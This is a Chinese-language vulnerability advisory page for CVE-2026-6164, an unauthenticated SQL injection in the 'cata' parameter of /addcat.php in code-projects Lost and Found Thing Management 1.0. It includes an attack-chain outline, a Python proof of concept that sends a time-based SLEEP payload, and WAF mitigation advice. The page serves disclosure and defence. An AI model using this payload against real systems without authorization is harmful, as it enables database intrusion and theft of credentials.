CVE-2026-6164 CVSS 7.3 高危

CVE-2026-6164 Lost and Found Thing Management SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6164

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Lost and Found Thing Management

漏洞概述

code-projects Lost and Found Thing Management 1.0版本存在安全漏洞。该漏洞位于文件/addcat.php中，由于对用户输入的参数'cata'处理不当，导致存在SQL注入漏洞。攻击者无需认证即可通过网络远程发起攻击，利用该漏洞可导致数据库信息泄露或数据被篡改。目前该漏洞的利用代码已被公开，建议相关用户尽快采取防护措施。

技术细节

该漏洞是由于code-projects Lost and Found Thing Management 1.0在/addcat.php文件中未正确过滤用户输入导致的SQL注入。在处理'cata'参数时，应用程序可能直接将其拼接到SQL查询语句中，而没有使用预编译语句（Prepared Statements）。攻击者可以通过发送特制的HTTP POST请求，在'cata'参数中注入恶意SQL代码。由于CVSS向量显示PR:N（无需权限）和UI:N（无需用户交互），该漏洞利用门槛较低。攻击者成功利用后，可以绕过认证，从数据库中提取敏感信息（如用户名、密码哈希），或者在特定条件下执行数据库写操作，影响系统的保密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标正在运行code-projects Lost and Found Thing Management 1.0，并定位到/addcat.php接口。

STEP 2

2. 构造载荷

攻击者构造包含恶意SQL语句的HTTP请求，针对'cata'参数进行注入测试，例如使用单引号闭合查询或使用UNION SELECT语句。

STEP 3

3. 发起攻击

攻击者通过网络向目标服务器发送特制的请求数据包。由于无需认证，请求直接到达后端处理逻辑。

STEP 4

4. 执行与利用

后端数据库执行了恶意的SQL命令，返回敏感数据或产生延迟响应，攻击者据此判断注入成功并获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    target = f"{url}/addcat.php"
    # Using a simple time-based payload for demonstration
    payload = {
        "cata": "1' OR SLEEP(5)-- -"
    }
    try:
        print(f"[+] Sending payload to {target}...")
        response = requests.post(target, data=payload, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] The application appears to be vulnerable to SQL Injection (Time-based).")
        else:
            print("[-] Vulnerability not confirmed with this payload.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target_ip = "http://127.0.0.1"
    check_sqli(target_ip)

影响范围

code-projects Lost and Found Thing Management 1.0

防御指南

临时缓解措施

在无法立即修复代码的情况下，建议部署Web应用防火墙（WAF），配置规则拦截针对/addcat.php接口的异常请求，特别是包含SQL注入特征字符（如单引号、注释符、UNION关键字等）的流量。同时，建议暂时关闭该功能模块的外部访问权限以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6164
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6164
3 Details https://www.cvedetails.com/cve/CVE-2026-6164/
4 VulDB https://vuldb.com/cve/CVE-2026-6164
5 Link https://code-projects.org/
6 Link https://github.com/lanPwa/CVE/issues/1
7 Link https://vuldb.com/submit/797089
8 Link https://vuldb.com/vuln/357052
9 Link https://vuldb.com/vuln/357052/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表